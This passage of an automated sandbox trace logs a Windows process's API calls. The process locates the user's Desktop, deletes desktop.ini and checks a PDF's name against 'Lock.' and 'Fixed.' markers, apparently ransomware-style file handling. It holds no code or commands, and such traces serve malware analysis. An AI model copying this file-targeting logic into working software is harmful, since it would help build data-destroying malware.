lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0142.497] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0142.497] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0142.497] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0142.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0142.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0142.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0142.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0142.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0142.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0142.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0142.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0142.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0142.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0142.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0142.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0142.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0142.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0142.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0142.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0142.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0142.498] CloseHandle (hObject=0x2d0) returned 1 [0142.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0142.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0142.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0142.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0142.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0142.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0142.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0142.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0142.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0142.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0142.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0142.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0142.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0142.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0142.574] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0142.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0142.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0142.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0142.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0142.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0142.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0142.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0142.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0142.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0142.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0142.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0142.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0142.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0142.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0142.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0142.575] CloseHandle (hObject=0x2a0) returned 1 [0142.581] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0142.581] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0142.581] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0142.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0142.582] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFilePart=0x8cedf4*="desktop.ini") returned 0x23 [0142.582] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini")) returned 0x26 [0142.582] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="desktop.ini", cAlternateFileName="")) returned 0xa87250 [0142.582] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini")) returned 1 [0142.584] FindNextFileW (in: hFindFile=0xa87250, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0142.584] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0142.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0142.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0142.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0142.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0142.584] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0142.584] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0142.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0142.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0142.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0142.584] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0142.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0142.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0142.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0142.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0142.584] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0142.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0142.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0142.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0142.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0142.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0142.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0142.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0142.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0142.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0142.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0142.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0142.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0142.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0142.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0142.585] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x48) returned 0x2e563a8 [0142.585] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x23 [0142.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0142.585] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini")) returned 0xffffffff [0142.585] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0142.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0142.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0142.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0142.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0142.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0142.586] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0142.586] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0142.586] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0142.587] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0142.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0142.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0142.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0142.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0142.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0142.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0142.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0142.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0142.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0142.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0142.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0142.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0142.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0142.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DH-NxMw2Lrt0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0142.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H-NxMw2Lrt0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0142.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-NxMw2Lrt0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0142.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NxMw2Lrt0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0142.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xMw2Lrt0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0142.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mw2Lrt0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0142.588] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w2Lrt0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0142.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2Lrt0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0142.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lrt0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0142.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rt0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0142.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0142.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0142.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0142.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="14_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0142.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0142.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0142.590] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j.pdf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0142.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0142.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0142.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0142.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0142.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0142.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0142.590] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0142.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0142.590] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0142.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0142.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0142.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0142.590] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0142.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0142.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0142.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0142.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x2c) returned 0x2e7fe68 [0142.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0142.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DH-NxMw2Lrt0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0142.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="H-NxMw2Lrt0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0142.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-NxMw2Lrt0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0142.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NxMw2Lrt0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0142.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xMw2Lrt0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0142.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mw2Lrt0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0142.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w2Lrt0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0142.591] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2Lrt0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0142.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lrt0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0142.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rt0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0142.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0142.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0142.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0142.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="14_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0142.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0142.592] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_j.pdf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0142.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0142.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0142.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 